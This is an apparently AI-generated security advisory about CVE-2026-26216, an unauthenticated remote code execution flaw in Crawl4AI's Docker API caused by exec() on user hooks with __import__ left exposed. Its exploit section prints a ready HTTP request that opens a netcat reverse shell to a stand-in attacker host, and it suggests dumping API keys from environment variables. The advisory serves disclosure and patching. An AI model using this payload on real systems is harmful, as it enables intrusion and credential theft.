CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26216
10.00.20%

Crawl4AI RCE: Hook, Line, and Sinker

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 16, 2026·6 min read·28 visits

PoC Available

Executive Summary (TL;DR)

Unauthenticated Remote Code Execution in Crawl4AI Docker deployments. The application allows users to define custom Python 'hooks' for web scraping. The sandbox implementation failed to block the `__import__` builtin, allowing attackers to escape the sandbox and execute system commands as the container user. Patch immediately to v0.8.0.

A Critical RCE in Crawl4AI's Docker API allows unauthenticated attackers to execute arbitrary Python code via the 'hooks' parameter. By leveraging an insecure implementation of 'exec()' and a failed attempt at sandboxing that left '__import__' exposed, attackers can bypass restrictions and compromise the host container.

The Hook: When Flexibility Meets Fatal Flaws

In the gold rush of the AI era, data is the shovel. Crawl4AI positioned itself as the high-speed conveyor belt for that shovel, a tool designed specifically to scrape the web and feed clean data into Large Language Models (LLMs). To make this tool versatile, the developers added a feature that sounded great on paper but was catastrophic in practice: Hooks.

Hooks allow users to modify the scraping behavior on the fly. Need to strip some HTML before processing? Add a hook. Need to execute custom logic when a page loads? Add a hook. In the Docker API deployment, these hooks are passed as strings within a JSON payload.

Here is the problem: to make a hook work, the application has to execute code provided by the user. If you are a security researcher, your ears just perked up. Allowing users to send code to be executed on your server is the digital equivalent of handing a burglar your house keys and asking them to water your plants while you're on vacation. You're trusting them to only water the plants.

The Flaw: The Sandbox That Wasn't

The developers of Crawl4AI weren't completely oblivious to the danger. They knew that running raw user code was risky, so they attempted to implement a 'sandbox'. In Python, this usually involves using exec() or eval() with a restricted scope—specifically, by limiting the globals and locals dictionaries passed to the function.

The idea is simple: if you don't give the code access to the os module or the subprocess module, it can't hurt you, right? Wrong. This is the 'blacklist' approach to security, and it almost never works in dynamic languages like Python.

The specific failure here was leaving the __import__ builtin accessible. Python's object model is introspective and powerful. Even if you remove os from the namespace, if __import__ is present, the attacker can simply say "I'd like the os module, please," and Python obliges. The sandbox was effectively a door with a heavy deadbolt but no hinges.

The Code: Anatomy of a Failure

Let's look at what this vulnerability likely looks like under the hood. While the exact proprietary source isn't pasted here, the mechanism described is a classic Python anti-pattern. The vulnerable code handles the hooks parameter from the API request and passes it to an execution handler.

The Vulnerable Logic:

# Simplified representation of the flaw
def execute_hook(hook_code, context):
    # The developer tries to be safe by defining a "safe" scope
    safe_globals = {
        'math': math,
        'str': str,
        # ... other innocuous builtins ...
        # FATAL ERROR: __import__ is often available by default 
        # in __builtins__ unless explicitly stripped or overwritten
    }
    
    # The sink
    exec(hook_code, safe_globals)

Because the __builtins__ were not rigorously scrubbed (or were implicitly included), the __import__ function remained available. This meant that while the developer thought they were restricting the environment to string manipulation and basic math, they were actually providing a full shell.

The Fix (v0.8.0):

In version 0.8.0, the remediation likely involved either removing the dynamic hook execution feature entirely from the public API or implementing a significantly more robust sandboxing mechanism (though in Python, exec is rarely truly safe). The immediate recommendation is simply to upgrade, which typically sanitizes or removes this capability.

The Exploit: Escaping the Container

Exploiting this is trivially easy for anyone who knows Python. We don't need buffer overflows or heap spraying; we just need to ask the server nicely. The attack vector is the /crawl endpoint, specifically the hooks parameter.

Here is the kill chain:

  1. Target: A Crawl4AI instance on port 8080.
  2. Payload: A JSON object defining a hook for on_execution_started.
  3. Mechanism: Use __import__('os') to load the operating system interface, then .system() or .popen() to run shell commands.

The Payload:

POST /crawl HTTP/1.1
Host: target-ip:8080
Content-Type: application/json
 
{
  "urls": ["http://google.com"],
  "hooks": {
    "on_execution_started": "__import__('os').system('nc -e /bin/sh attacker.com 4444')"
  }
}

In this scenario, as soon as the crawl job initializes, the server executes the hook. The Python interpreter resolves __import__, loads os, executes the Netcat reverse shell, and suddenly you have a terminal inside their Docker container. From there, you can dump environment variables (which often contain API keys for OpenAI, Anthropic, or AWS), modify the filesystem, or pivot to other containers on the same network.

The Impact: Why This Matters

You might be thinking, "It's just a Docker container, who cares?" You should care. In modern DevOps environments, containers are rarely isolated islands. They are often run with:

  1. Environment Variables: Containing sensitive API keys (OpenAI, AWS, DB credentials) needed for the application to function.
  2. Mounted Volumes: Access to host filesystems or shared data directories.
  3. Internal Network Access: The ability to talk to internal databases, Redis caches, or other microservices that aren't exposed to the public internet.

With a CVSS score of 10.0, this is a "drop everything and patch" situation. An unauthenticated RCE means that automated botnets will likely start scanning for this vulnerability to install crypto-miners or add the server to a DDoS fleet. If you are running Crawl4AI to power your LLM pipeline, an attacker could also poison your data or steal your proprietary datasets.

The Fix: Closing the Window

The mitigation is straightforward: stop using the vulnerable version. The developers released version 0.8.0 which resolves this issue. If you are running unclecode/crawl4ai in Docker, you need to pull the latest image immediately.

Remediation Steps:

  1. Update: docker pull unclecode/crawl4ai:latest
  2. Restart: Bounce your containers to ensure the new code is running.
  3. Verify: Check the version logs on startup.

Defense in Depth:

Beyond patching, this vulnerability highlights why you shouldn't expose internal tools to the public internet without authentication. Even if the app claims to have auth, put it behind a reverse proxy (like Nginx or Traefik) and enforce your own Basic Auth or mTLS. Never assume an internal tool is hardened against public internet threats.

Official Patches

Crawl4AIRelease v0.8.0 addressing the vulnerability

Fix Analysis (1)

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
0.20%
Top 58% most exploited

Affected Systems

Crawl4AI Docker API (versions < 0.8.0)

Affected Versions Detail

Product
Affected Versions
Fixed Version
Crawl4AI
unclecode
< 0.8.00.8.0
AttributeDetail
CWE IDCWE-94 (Improper Control of Generation of Code)
CVSS v3.110.0 (Critical)
Attack VectorNetwork (Unauthenticated)
ImpactRemote Code Execution (RCE)
EPSS Score0.20% (Rising)
Exploit StatusProof of Concept Available

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.006Command and Scripting Interpreter: Python
Execution
T1611Escape to Host
Privilege Escalation
CWE-94
Improper Control of Generation of Code ('Code Injection')

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Known Exploits & Detection

Nuclei TemplatesNuclei template for detecting unauthenticated RCE in Crawl4AI
NucleiDetection Template Available

Vulnerability Timeline

Vulnerability Disclosed via GHSA
2026-01-16
CVE-2026-26216 Assigned
2026-02-12
Patch (v0.8.0) Released
2026-02-12
Public PoC Released
2026-02-17

References & Sources

  • [1]GitHub Security Advisory
  • [2]NVD Entry

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.